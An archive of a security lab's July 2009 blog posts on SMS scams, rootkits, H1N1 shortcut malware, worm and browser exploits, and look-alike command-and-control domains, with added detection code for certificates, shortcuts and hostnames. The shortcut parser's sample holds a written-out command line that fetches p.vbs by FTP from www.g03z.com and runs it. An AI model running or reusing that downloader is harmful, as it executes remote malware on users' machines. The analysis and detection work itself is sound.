NEWS FROM THE LAB - July 2009
 
Friday, July 31, 2009

 
Received an SMS message from a service number with a link in it? Posted by Jarno @ 08:06 GMT

It has been a while since we posted about SMS spam [older article, follow-up].

Now we have heard of new incidents involving a money scam. The scam starts with the user receiving an innocent-looking web link over SMS, wrapped in social-engineering text that makes him curious enough to click it.

If the user opens the link in the phone's web browser, he gets a page informing him that he has just registered for a service, one that will automatically cost some euros per month. At this point our user naturally decides the SMS was spam and closes the browser without clicking anything.

Normally that would be the end of it: the user entered no personal information the spam company could use to identify him and send him the bill.

In this particular case things work differently. Even though the user entered nothing about himself, a charge still appears on his phone bill, because he has been subscribed to a premium content service.

How did that happen?

The key to this scam is the phone's browser configuration. By default, phone web browsers reach the Internet through the operator's WAP gateway. The gateway identifies the subscriber to the sites he visits and supplies the billing information that premium services use to charge the phone bill. So merely visiting a page through the WAP gateway hands a less than honest company enough information to issue a charge that is automatically added to the user's phone bill.

Whether this practice is legal depends on which country the user happens to live in, and as we are not lawyers we are not going to speculate further on that.

There is a very easy way to be safe from this kind of scam: don't use the WAP gateway. GSM operators normally send Internet configuration messages that also contain access point settings that bypass the WAP gateway. To take the non-WAP access point into use, look in the phone's web browser settings for an option called 'access point' or similar and change it away from anything labelled 'WAP services'.

The downside of not using the WAP gateway is that you will not be able to access premium content, if you are used to that; the upside is that random websites will not be able to identify you so easily.

Another option is to check whether your phone company allows you to set a block on premium rate billing and specify what kind of services you want to use. For example, most Finnish operators allow a user to specify that they want to use information services and public services such as SMS tram and metro tickets, but still block third party entertainment services.

 
 

 
 
Thursday, July 30, 2009

 
Vegas Baby! Posted by Antti @ 02:52 GMT

In Las Vegas, the first day of the Black Hat briefings is nearly complete. Black Hat is one of the biggest security conferences and always attracts skilled researchers to present their work.

Jeff Moss opening BlackHat 2009

Having worked quite a bit with our BlackLight rootkit scanning technology I ended up sitting a lot in the Rootkit track sessions. Day 1 included some interesting presentations:

Stoned Bootkit, Peter Kleissner

Peter presented an open development framework for creating rootkits that activate early in the boot process, from the Master Boot Record. Most of the technology has been seen in previous research, but the scary part lies in the extensibility of the Stoned Bootkit.

Stoned Bootkit

Peter briefly touched on some sample extensions. One example was the CO2 rootkit plugin that used ACPI to slow the CPU down to save the environment! Now this is all very nice, but I expect that the most enthusiastic users for the Stoned Bootkit framework will be in the malware author community. And please take my word on this: they're not in it to save the rain forests.

Introducing Ring -3 Rootkits, Alexander Tereshkin and Rafal Wojtczuk

Rootkits keep developing. In the past years, they've gone from usermode (Ring 3) to the kernel (Ring 0), from kernel to the hypervisor (Ring -1) and all the way to System Management Mode (Ring -2).

Alexander Tereshkin presenting

Alexander and Rafal explored the possibility of running malicious code in the Intel AMT execution environment. AMT is meant for remote management, but unfortunately what is remote management for the good guys is a rootkitted backdoor for the attackers. I'm betting this is not the end of the rootkit countdown, though. Anyone care to guess where the Ring -4 rootkits will run? I'm sure we'll see soon.

Of course not everything has been about rootkits. The first day included not one but two interesting talks on X.509, which is one of the building blocks of SSL/TLS.

Dan Kaminsky presenting

Among other things, Moxie Marlinspike and Dan Kaminsky had independently found a problem in most implementations that lets an attacker create certificates that appear valid for any web site. By cleverly embedding NULL characters in the certificate's name field, the attacker gets a browser to match a malicious certificate to a legitimate web site. Nice work from both researchers!
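The failure mode described above, in miniature. This is an added example and not code from either talk or from this post; the hostnames (bank.example, attacker.example) are constructed. The certificate's subject name carries an explicit length, but the flawed matcher hands it to C-style string routines, which stop at the first NUL; a CA that validates ownership of the registrable suffix sees only the tail the attacker really owns.

```python
"""The NULL-prefix certificate problem in miniature.  Added example, not code
from either talk or from the post; the hostnames are constructed."""


def _c_string(value: str) -> str:
    """Model a C string API: the value ends at the first NUL byte."""
    return value.split("\x00", 1)[0]


def _wildcard_match(pattern: str, host: str) -> bool:
    """Match a subject name against a hostname, honouring a leading '*.' label."""
    if pattern == "*":          # bare '*': some implementations accepted any host
        return True
    if pattern.startswith("*."):
        return host.count(".") == pattern.count(".") and host.endswith(pattern[1:])
    return pattern == host


def name_matches_buggy(cn: str, host: str) -> bool:
    """The flawed check: the CN is an ASN.1 string with an explicit length, but it
    is handed to NUL-terminated string routines, so everything after the embedded
    NUL disappears before the comparison."""
    return _wildcard_match(_c_string(cn).lower(), host.lower())


def name_matches_fixed(cn: str, host: str) -> bool:
    """Length-aware check: a NUL can never appear in a DNS name, a bare '*' is not
    a valid name, and the whole string must match."""
    if "\x00" in cn or cn == "*":
        return False
    return _wildcard_match(cn.lower(), host.lower())


def ca_validated_domain(cn: str) -> str:
    """What a CA that checks ownership of the registrable suffix sees in the
    request: the applicant really does control the last two labels."""
    return ".".join(cn.split(".")[-2:])


# Constructed names: the attacker controls attacker.example and requests a
# certificate whose first label contains a NUL.
MALICIOUS_CN = "www.bank.example\x00.attacker.example"
UNIVERSAL_CN = "*\x00.attacker.example"

if __name__ == "__main__":
    print("CA validates:", ca_validated_domain(MALICIOUS_CN))
    for cn, host in ((MALICIOUS_CN, "www.bank.example"), (UNIVERSAL_CN, "any.host.example")):
        print(repr(cn), host, "buggy:", name_matches_buggy(cn, host),
              "fixed:", name_matches_fixed(cn, host))
```

The fix is not "strip the NUL" but "treat the name as length-delimited and reject anything that cannot be a DNS name"; the same reasoning applies to subjectAltName entries.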

Signing off from Las Vegas,
Antti

P.S. If you are attending, don't miss Mikko's talk on the Conficker worm on Thursday afternoon!

 
 

Monday, July 27, 2009

 
H1N1 Shortcut Malware Posted by Mikko @ 11:35 GMT

We ran into another new piece of malware using the "H1N1" swine flu as a lure.

This one is a shortcut file. It is not a Windows executable renamed to .LNK; it is an actual link file.

Here's what the file looks like (md5: d17e956522f83995654666c0f2343797).

H1N1

Looking at the file from the command prompt, it looks like a harmless shortcut, 1987 bytes in size.

H1N1

But when you view the contents, you see something suspicious:

H1N1

Let's have a look at the properties of the shortcut:

H1N1

It's linking to %ComSpec%? Doesn't sound too good. Let's copy and paste where this shortcut is linking to:

H1N1

That doesn't make much sense.

Let's break that into smaller pieces to see what it's doing:

LNK shortcut malware code

As an end result, clicking on this shortcut will cause your machine to do the following things:

  •  Connect to an ftp site called www.g03z.com
  •  Log in with username aa33 and password bb33
  •  Download a script called p.vbs
  •  Run the script
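How to get at those strings without opening the shortcut: the parser below reads the fields a .LNK keeps its command line in (the StringData arguments and the EnvironmentVariableDataBlock, which is where a link to %ComSpec% lives) and runs a few heuristics over the result. This is an added example, not the tooling used for the analysis above; the structure layout follows Microsoft's MS-SHLLINK specification, and the sample shortcut is constructed here to mirror the behaviour described (the host and credentials are the ones named in the post), not recovered from the real file, whose exact command line is not reproduced here.

```python
"""Pull the executable strings out of a Windows shortcut (.LNK) and flag the
pattern described above: a link to %ComSpec% whose arguments drive ftp.exe
from a script file and then launch what was downloaded.  Added example; the
layout follows MS-SHLLINK and the sample shortcut is constructed."""
import re
import struct

# LinkFlags bits from the ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
ENV_VAR_BLOCK_SIGNATURE = 0xA0000001  # EnvironmentVariableDataBlock, always 0x314 bytes
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and the environment-variable target of a .LNK."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # uint16 size, not counting itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # uint32 size, counting itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {"env_target": None}
    for name, flag in STRING_FIELDS:         # CountCharacters, then the characters
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[name] = data[pos:pos + count * width].decode(codec)
            pos += count * width
    # ExtraData: (BlockSize, BlockSignature, payload) blocks, ended by a size below 4.
    while pos + 4 <= len(data):
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 8 or pos + size > len(data):
            break
        sig = struct.unpack_from("<I", data, pos + 4)[0]
        if sig == ENV_VAR_BLOCK_SIGNATURE and size == 0x314:
            uni = data[pos + 268:pos + 788].decode("utf-16-le").split("\x00", 1)[0]
            ansi = data[pos + 8:pos + 268].split(b"\x00", 1)[0].decode("cp1252")
            fields["env_target"] = uni or ansi
        pos += size
    return fields


# Each heuristic is a regex over the command line the shortcut would run.
HEURISTICS = (
    (r"%comspec%|\bcmd(\.exe)?\b", "runs the command interpreter"),
    (r"\bftp(\.exe)?\b.*-s:", "drives ftp.exe from a script file (-s:)"),
    (r"\bopen\s+[\w.-]+|\w+://", "contacts a remote host"),
    (r"\b(start|[cw]script)\b|\.(vbs|js)\b", "launches or references a script"),
)


def shortcut_command(fields: dict) -> str:
    """Join target and arguments into the command line the shortcut would execute."""
    parts = (fields.get("env_target"), fields.get("relative_path"), fields.get("arguments"))
    return " ".join(p for p in parts if p)


def suspicious_findings(fields: dict) -> list:
    """Reasons to treat the shortcut as hostile (empty list: nothing matched)."""
    command = shortcut_command(fields)
    return [why for pattern, why in HEURISTICS if re.search(pattern, command, re.I)]


def build_sample_lnk(target: str, arguments: str) -> bytes:
    """Construct a minimal shortcut: header, an Arguments string and an
    EnvironmentVariableDataBlock carrying the target.  Demo input only."""
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, HAS_ARGUMENTS | IS_UNICODE,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    env_block = (struct.pack("<II", 0x314, ENV_VAR_BLOCK_SIGNATURE)
                 + target.encode("cp1252").ljust(260, b"\x00")
                 + target.encode("utf-16-le").ljust(520, b"\x00"))
    return header + string_data + env_block + struct.pack("<I", 0)


# Constructed to mirror the described behaviour; not the real file's command line.
SAMPLE_LNK = build_sample_lnk(
    "%ComSpec%",
    "/c echo open www.g03z.com>s&echo aa33>>s&echo bb33>>s&echo get p.vbs>>s"
    "&echo bye>>s&ftp -s:s&start p.vbs",
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(shortcut_command(parsed))
    for why in suspicious_findings(parsed):
        print(" -", why)
```

The parser deliberately stops short of the LinkTargetIDList, which is where a shortcut's real target normally lives; for triage of this family the environment-variable block and the arguments are what matter, and they are also what the Properties dialog shows.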

So who owns g03z.com? Well, it's Mr. Zzzzggg:

H1N1

The domain is still up, but the file p.vbs is currently missing from the server, so right now nothing happens.

We detect and block this malicious shortcut.

 
 

 
 
Friday, July 24, 2009

 
Assembly 2009 Posted by Mikko @ 09:43 GMT

assembly

The Assembly 2009 demo party starts two weeks from now. F-Secure is, once again, a sponsor of this major event.

An Invitation Intro for the happening has now been released and is available for download from Assembly.org.

Here's a YouTube video of the intro:


 
 

 
 
Thursday, July 23, 2009

 
Targeted Malware Calling Home... Posted by Mikko @ 13:38 GMT

In targeted attacks, we're seeing more and more attempts to disguise the hostname of the server to which the backdoors connect.

IT staff in many of the targeted organizations are fully aware of these attacks. They keep monitoring their logs for suspicious activity.

The admins might spot a host that suddenly connects to known rogue locations such as:

  •  weloveusa.3322.org
  •  boxy.3322.org
  •  jj2190067.3322.org
  •  hzone.no-ip.biz
  •  tempsys.8866.org
  •  zts7.8800.org
  •  shenyuan.9966.org
  •  xinxin20080628.gicp.net

However, we've now seen a shift in the hostnames. The attackers seem to be registering misleading domain names on purpose, and have now been seen using hosts with names such as:

  •  ip2.kabsersky.com
  •  mapowr.symantecs.com.tw
  •  tethys1.symantecs.com.tw
  •  www.adobeupdating.com
  •  iran.msntv.org
  •  windows.redirect.hm

The apparent motive here is that a busy IT administrator might look at a firewall log alert about a machine connecting to www.adobeupdating.com and just disregard it. "That must be the PDF reader trying to download updates…" In reality, adobeupdating.com is registered to somebody in Zaire and has an IP address pointing to Australia.
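The busy administrator's problem is exactly the one a small triage script can take off his plate. Below is an added example, not the lab's own tooling: it flags hostnames on the dynamic-DNS providers seen in the first list above and hostnames that carry, or sit one or two edits away from, a vendor brand without belonging to that vendor. The brand-to-domain map and the short table of two-level suffixes are assumptions made for the demo; a real deployment would use the Public Suffix List and a proper allow-list of vendor domains.

```python
"""Triage of command-and-control hostnames: dynamic-DNS providers and
look-alike vendor names.  Added example, not the post's own tooling.  The
dynamic-DNS suffixes come from the hostnames listed above; BRANDS and
SECOND_LEVEL_SUFFIXES are assumptions for the demo."""

DYNAMIC_DNS_SUFFIXES = {"3322.org", "8866.org", "8800.org", "9966.org", "no-ip.biz", "gicp.net"}

# Brand tokens and the registrable domains that legitimately carry them (assumed).
BRANDS = {
    "kaspersky": {"kaspersky.com"},
    "symantec": {"symantec.com"},
    "adobe": {"adobe.com"},
    "microsoft": {"microsoft.com"},
    "windows": {"microsoft.com", "windows.com"},
    "msn": {"msn.com"},
}

# Suffixes under which the registrable name is three labels long (partial list).
SECOND_LEVEL_SUFFIXES = {"com.tw", "co.uk", "com.cn", "co.jp", "com.au"}


def registrable_domain(host: str) -> str:
    """The part of the name somebody had to register (simplified PSL logic)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str) -> list:
    """Return the reasons a hostname deserves a second look (empty list: none)."""
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    reasons = []
    if reg in DYNAMIC_DNS_SUFFIXES:
        reasons.append(f"dynamic DNS provider {reg}")
    labels = host.split(".")
    reg_label = reg.split(".")[0]
    for brand, owned in BRANDS.items():
        if reg in owned:
            continue                          # the vendor's own domain
        if any(brand in label for label in labels):
            reasons.append(f"brand '{brand}' in a domain not owned by the vendor ({reg})")
        elif len(brand) >= 5 and levenshtein(reg_label, brand) <= 2:
            reasons.append(f"'{reg_label}' is within 2 edits of '{brand}'")
    return reasons


def triage(hosts) -> dict:
    """Map each hostname to its findings, leaving out hosts with nothing to report."""
    return {h: r for h in hosts for r in [classify_host(h)] if r}


# Hostnames from the two lists above, for the demo run.
OBSERVED = [
    "weloveusa.3322.org", "boxy.3322.org", "jj2190067.3322.org", "hzone.no-ip.biz",
    "tempsys.8866.org", "zts7.8800.org", "shenyuan.9966.org", "xinxin20080628.gicp.net",
    "ip2.kabsersky.com", "mapowr.symantecs.com.tw", "tethys1.symantecs.com.tw",
    "www.adobeupdating.com", "iran.msntv.org", "windows.redirect.hm",
]

if __name__ == "__main__":
    for host, reasons in triage(OBSERVED).items():
        print(host, "->", "; ".join(reasons))
```

The edit-distance check is restricted to brands of five or more characters because short tokens such as "msn" are within two edits of far too many legitimate labels; the substring check still catches those.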

 
 

 
 
Wednesday, July 22, 2009

 
New Set of Bait Files Posted by Mikko @ 12:32 GMT

Three weeks ago we posted a series of screenshots of bait document files used in targeted attacks. These are files that have been used to infect specific individuals in different organizations in order to gain access to their computer.

All the documents shown below contained exploits that installed backdoors. Targets of these attacks are not known.

[Screenshots of nine bait documents]

Again, this was just a quick sampling; we get a lot of these.

We'll be blogging more tomorrow about a change in the hostnames used in these attacks.

P.S. Feel free to leave suggestions for translations of the non-English documents in the comments section.

 
 

 
 
Tuesday, July 21, 2009

 
Real-world Viruses vs Computer Viruses Posted by Mikko @ 08:13 GMT

We recently saw this malicious file being spread in e-mails. The name of the file was Novel H1N1 Flu Situation Update.exe and its icon made it look like a Word document.

When the file was opened, it created several new files on the hard drive:

  •  %windir%\Temp\Novel H1N1 Flu Situation Update.doc
  •  %windir%\Temp\doc.exe
  •  %windir%\Temp\make.exe
  •  %windir%\system32\UsrClassEx.exe
  •  %windir%\system32\UsrClassEx.exe.reg

The executables contain backdoor functionality, including an elaborate keylogger.

And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file. This is what the document looks like.

Novel H1N1 Flu Situation Update

We detect this file (MD5 d8a9fb16318130ccd7924e03b33070c1) as Agent.avzq.

 
 

 
 
Michael Jackson Malware is Not Dead Posted by Mikko @ 07:50 GMT

Michael Jackson is dead and buried, but we continue to see malware using his name.

Like this one, which was spammed out in an attachment called MichaelJackson.jpg.exe.

When opened, the executable drops an mIRC-based IRC bot and displays this image on screen:

Michael Jackson

After this, the malware connects to an IRC-server in Germany called corina.ath.cx and starts accepting commands from channel #bran.

We detect this file (MD5: 60bbc36c17edb0fb4724046655237ab8) as a Zapchast variant.

 
 

 
 
Monday, July 20, 2009

 
Q & A on "Sexy View" SMS worm Posted by Mikko @ 12:58 GMT

There has been lots of media coverage for the Yxe aka Sexy Space aka Sexy View mobile worm. So here's a Q&A to answer some questions on it:

Q: Why is this worm important?
A: It's the first text message worm in history.

Q: I thought text message worms were just urban legends!
A: Definitely not.

Q: How can you attach a worm into a text message?
A: You can't. Instead, the worm puts a web link pointing to the worm's web site into a text message.

Q: A link? Can you click on a link in a text message?
A: Yes. On practically all smartphones. Just like you can click on a link in an e-mail.

Q: Why would I click on such a link?
A: Because the link is in a convincing message.

Q: Convincing how?
A: Convincing as in a text message coming from your best friend with a message like "Check this out!" and a web link.

Q: Would such a message be spoofed or would it really come from my friend's phone?
A: Yxe sends its messages to phone numbers found in the phonebook. So if your friend gets infected, you get the message from his phone.

Q: What kind of messages does it send?
A: These vary, as the worm downloads a fresh message template from a website.

Q: Is this a mobile botnet?
A: Not really. The only remote control the worm has is the above update mechanism to change what kind of text messages are being sent. But it's close.

Q: What happens if I follow the link?
A: The link will take you to a website which will automatically push a SIS installation package to your phone. You get one prompt: Install Sexy Space? Yes or No.

Q: No security warnings?
A: No.

Q: But there should be a security warning, unless the SIS package has been signed!
A: It has been signed.

Q: Why did Symbian sign it?
A: We believe the virus writer submitted the malware through the Express Signing procedure, where most applications are not inspected by humans.

Q: Ok, so I click Yes. What happens then?
A: The worm will install itself on your device, and will send a similar text message to all contacts listed in your phonebook. These messages are sent in your name and from your phone.

Q: Who pays for these messages?
A: You do. If you're infected, you will pay for each SMS sent by the worm. A typical cost for a single text message might be 5 cents. If you have 500 contacts in your phone, an infection would cost you 500 times 5 cents.

Q: In addition to spreading, what does the worm do?
A: It steals information from the local phone and sends it away, including the IMEI number of the phone.

Q: What's the motive?
A: We don't know.

Q: Where are these YXE worms written?
A: In China.

Q: Which companies submitted these YXE worms for signing?
A: Companies called XiaMen Jinlonghuatian Technology Co. Ltd., ShenZhen ChenGuangWuXian Tech. Co. Ltd. and XinZhongLi TianJin Co. Ltd.

Q: Has Symbian revoked these certificates yet?
A: Yes.

Q: So the problem is over, then?
A: No. The revocation certificates are not immediately distributed to all the hundreds of millions of Symbian smartphones. The default setting in most Symbian phones has to be changed to enable them to receive revocation certificates. To do this, go to Application Manager's Settings and set the Online certificate check to Must be passed.

Here's a picture of what you should do:

Cert check

Q: How widespread is this?
A: Not very. We have very few confirmed reports. Yxe seems to be a problem only in China and Middle East at the moment.

Q: Which phones are affected by this?
A: All Symbian Series 60 3rd Edition phones by Nokia, LG and Samsung. So, for example, best-selling phones like Nokia N95 or Nokia E71.

Q: Who cares. Nobody uses Symbian anyway. iPhone rocks.
A: Symbian has 49% market share of the smartphone market. iPhone has 10%.

 
 

 
 
Friday, July 17, 2009

 
Firefox 3.5.1 Posted by Sean @ 09:15 GMT

There's a critical vulnerability in Firefox 3.5 and there are malicious sites actively exploiting the flaw in the wild.

Firefox 3.5.1 has been released to resolve the issue — update now, not later.

Firefox 3.5.1

 
 

 
 
Thursday, July 16, 2009

 
Online Scanner 4.1 Posted by Sean @ 15:52 GMT

Our Online Scanner has been updated to include a new set of scanning engines.

Version 4.1 includes the same set as will be in our upcoming Internet Security 2010 (and the same as those of you testing ISTP).

It's compatible with both IE and Firefox. Details here and the scanner is here.

Online Scanner 4.1

 
 

 
 
Tuesday, July 14, 2009

 
Protection Against Office Web Components Vulnerability Posted by Response @ 22:09 GMT

Yesterday a new vulnerability was announced in Microsoft Office Web Components and as with all new exploits that can be used in drive-by downloads we tried it with F-Secure ISTP and ExploitShield. Yet again ExploitShield protected the user without the need for any updates. Here's the video showing the exploit in action when ISTP is installed together with Internet Explorer 6 and Internet Explorer 8.

ISTP in action

 
 

 
 
Remotely Exploitable Hole in HTC's Bluetooth Posted by Response @ 15:11 GMT

An interesting vulnerability in the Windows Mobile 6 OBEX FTP service was disclosed back in January.

The author of that research, Alberto Moreno Tablado, recently contacted us to let us know there's an update.

From Tablado:

The vulnerability was first disclosed in January 2009 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6. However, further investigations proved that the issue is in a 3rd party driver installed by HTC. Microsoft states that the OBEX FTP server driver affected is a 3rd party driver installed by HTC on its devices running Windows Mobile, so the vulnerability only affects this vendor specifically and other vendors' Windows Mobile devices are not affected.

Furthermore, in January it appeared that vulnerable devices needed to be paired with their attackers. Tablado now states that more sophisticated attacks, such as sniffing the Bluetooth pairing, link-key cracking and MAC address spoofing, can be used to avoid this requirement.

OBEX directory traversal display, screenshot from seguridadmobile.com

The following devices are reported as vulnerable:

  •  HTC devices running Windows Mobile 6 Professional
  •  HTC devices running Windows Mobile 6 Standard
  •  HTC devices running Windows Mobile 6.1 Professional
  •  HTC devices running Windows Mobile 6.1 Standard

Full details can be found on Seguridad Mobile's website.

Our thanks goes to Mr. Tablado for the update on his very interesting research.

Firefox Memory Corruption Vulnerability Posted by Sean @ 13:42 GMT

No one particular browser is completely secure and today brings additional evidence of this fact with the posting of a Firefox exploit that allows for the execution of arbitrary code. The current version of Firefox (3.5) is affected and older versions may be as well.

The vulnerability in Firefox 3.5 is caused by an error in the handling of JavaScript code. See our vulnerability description for additional information. The exploit, discovered by SBerry, was posted to a popular exploit site yesterday.

Joshua, one of our Browsing Protection researchers tested this Firefox exploit against our Exploit Shield technology.

And the result was good. Our Exploit Shield heuristically detected it as shellcode and blocked the exploit.

Exploit Shield Block of SA200903371

0-Day browser protection against 0-Day exploits. Exploit Shield will be part of this year's product release.

A standalone Exploit Shield beta is available from our Technology Preview pages.

—————

Note: Firefox is a great browser… but you still want to practice safe surfing habits.

—————

Updated to add: In case there is any confusion, our earlier post regarding Firefox 3.5 discussed exploits targeting outdated web apps/plugins in the updated browser; whereas this exploit targets a vulnerability in the browser itself.

 
 

 
 
Monday, July 13, 2009

 
Roundtable MP3 Posted by Mikko @ 15:47 GMT

Last week I attended a round table discussion in Sydney, Australia called The future of the digital economy.

Other participants included Graham Ingram from AusCERT and Neil Gaughan from Australian Federal Police.

Risky Business has published a podcast of the event, available here.

Signing off,
Mikko

1GB of Free Online Storage Posted by Sean @ 15:05 GMT

Would you like to have a remote network drive to backup/store your personal data?

Well then, the folks at Steek offer 1GB of free secured online storage. It's fully integrated with Windows Explorer and works like an external hard drive.

You'll find it here.

Steekr - Secured Online Space

Why do we mention Steek and remote backup/drive space?

Because Steek was purchased last Friday… They're now part of F-Secure.

Those of you that have tried our Online Backup are already familiar with some of their work.

Bonjour to our new Fellows!

(Another) Microsoft Security Advisory Posted by Sean @ 14:19 GMT

There's a new Microsoft Security Advisory (973472) to review while waiting for tomorrow's Microsoft Updates.

A vulnerability exists in the ActiveX control used by, wait for it… Internet Explorer to display Excel spreadsheets (Office Web Components). It doesn't affect Office 2007 but many other versions are vulnerable.

Microsoft Security Advisory 973472

Considering the timing of this advisory, it isn't likely to be patched tomorrow, so check out the workaround instructions.

Microsoft states that they're aware of "attacks attempting to exploit the vulnerability".

This most recent advisory joins a growing list of Internet Explorer vulnerabilities.

Microsoft Security Advisories

91% of you know what to do

—————

Updated to add: SANS Internet Storm Center raised its threat level to Yellow yesterday.

SANS is seeing active exploit pages in use. More updates are available here.

Updated Browser, Old-school Attack Posted by Alia @ 07:41 GMT

So Firefox 3.5 is available and it has quickly become a hot download item, with almost 24 million downloads worldwide so far. The browser itself is touted as faster, safer and just better, but that's no reason not to be cautious.

One of our Vulnerability Analysts turned up this video the other day. The video title says "Firefox Exploit" but so far in our analysis, it looks like the exploits aren't really targeting Firefox.

The attack itself is rather comprehensive — there are at least 3 exploits being tried and their execution is a little involved. The exploits target vulnerable Adobe Flash players (CVE-2007-0071) and Microsoft ActiveX Controls (CVE-2008-0015). The last exploit has been making the rounds in the wild recently.

Still, the vector being used is the tried and true route of a vulnerable web application. So it's basically the same old hole in a brand new dress. Updating the browser — good. Not updating web apps at the same time — not so good. Just as a precaution, don't forget to update all your plugins, apps and so on when you update your browser!

Having said that, our Exploit team is currently digging deeper into certain features of the exploits. We'll add updates if and when any more interesting features turn up.

—————

Updated to add: The exploits in the malicious website are targeting the following vulnerabilities:

  •  CVE-2009-1136
  •  CVE-2008-0015
  •  CVE-2008-2463
  •  CVE-2007-0071

Three of the vulnerabilities are related to ActiveX Controls. CVE-2009-1136 is the subject of the latest Microsoft Security Advisory (973472) and is also the subject of one of our later posts (see above). Visiting the malicious site with Internet Explorer 6 and 7 caused the browsers to crash and the payload to run.

It looks like the only vulnerability that has more impact on Firefox 3.5 is CVE-2007-0071, which affects Flash players. Visiting the website with the latest Flash player, or without it installed, may not trigger the drive-by download.

Still, that doesn't mean the user is 100% protected if they do visit the website. The site's contents appears to have changed since that video came out, so it is possible the exploits (and targeted vulnerabilities) have changed as well.

So whatever browser or web app version is installed, just don't visit a known malicious website.

—————

Updated again to add: An actual exploit targeting the Firefox 3.5 browser itself – rather than an outdated web app or plugin – has since been reported.

 
 

 
 
Friday, July 10, 2009

 
Microsoft Advance Notification for July Posted by Sean @ 14:37 GMT

As there are currently 0-day vulnerabilities being exploited in the wild — you may wish to read this July's advance security bulletin.

Microsoft Security Bulletin, July 2009

Be prepared for next Tuesday's updates — see the Microsoft Security Bulletin Advance Notification for July 2009 for details.

 
 

 
 
Thursday, July 9, 2009

 
"Sexy Space" Symbian Worm Posted by Response @ 13:11 GMT

Dancho Danchev of ZDNet's Zero Day blog has an interesting post regarding Transmitter.C — which is supposedly a significant modification of the Sexy View SMS worm that we posted about in February.

We've analyzed this new variant, which we call Worm:SymbOS/Yxe.D, and from our point of view there are no major differences from our original detection.

Except for one thing…

This Yxe.D variant is signed with a certificate from yet another company.

yxe.d certificate info

So now there are two Symbian-approved worm vendors for S60 3rd Edition phones.

See our Worm:SymbOS/Yxe description for additional details.

 
 

 
 
Wednesday, July 8, 2009

 
Lyzapo DDoS Attack on US and South Korean Websites Posted by Mikko @ 20:05 GMT

There's a fairly large-scale DDoS attack underway, targeting several South Korean and US websites.

The sites hurt most at the moment seem to be FTC.GOV and usauctionslive.com.

usauctionslive.com     ftc.gov

Other targets, like whitehouse.gov seem to be unaffected (then again, whitehouse.gov runs under Akamai, making it a much harder target).

Some sources have linked this attack to the 5-year-old Mydoom worm family. Here's what we know: a pack of sample files related to this attack has been making the rounds between antivirus labs.

One of those files (MD5: 93322e3614babd2f36131d604fb42905) really is a Mydoom variant.

We detect it as Email-Worm.Win32.Mydoom.hw. However, we can't find any evidence that this particular file would attack any of the targets currently under DDoS.

—————

Updated to add: More information via SANS Diary.

Google Chrome OS Posted by Sean @ 13:46 GMT

Our previous post noted the increasing number of browser options. Well, soon there will be an additional OS option as well.

Google announced the development of Google Chrome OS on their official blog last night.

   "Google Chrome OS is an open source, lightweight operating system that will
    initially be targeted at netbooks."

   "Speed, simplicity and security are the key aspects of Google Chrome OS."

Of course with Google, a key question is not just security, but one of privacy.

Yesterday, American Public Media's Marketplace broadcast an interview with Google Chairman and CEO Eric Schmidt. Privacy issues were discussed during the interview. The full transcript can be found here.

More information here.

Poll: What's your favorite web browser? Posted by Sean @ 11:23 GMT

There's a TechCrunch post that claims Internet Explorer has lost 11.4 percent market share since March of this year.

Others question the data sources, but while they may doubt the percentages, they agree that IE's market share is generally falling.

Whatever its market share, one thing is certain: web browser competition is quite healthy at the moment and consumers have plenty of options to choose from.

Chrome, IE, Firefox, Safari, Opera

We hosted a June 2008 poll asking about our readers' preferred browser.

Let's do it again.

Which of the following options is your preferred web browser?

Poll results

 
 

 
 
Monday, July 6, 2009

 
F-Secure ISTP and the 0-day Vulnerability in MSVIDCTL.DLL Posted by Response @ 23:54 GMT

As mentioned in the previous post there's a new 0-day vulnerability in Microsoft's ActiveX Video Controls, more specifically in the file msvidctl.dll. Microsoft now has published an advisory about the vulnerability and in the advisory they recommend that you set the killbit to disable the vulnerable CLSIDs, all 45 of them.

As this vulnerability is actively being used in drive-by downloads it's a good idea to do this.

Or, you could download our free Internet Security Technology Preview or our standalone ExploitShield beta, which also protects against this — proactively, without the need for updates.

We tried our Internet Security Technology Preview (on which our upcoming 2010 product will be based) and its Browsing Protection against this new exploit and it worked like a charm. It blocked the exploit attempt without the need for any signatures/shields. The generic exploit protection is pretty awesome, as is ExploitShield itself.

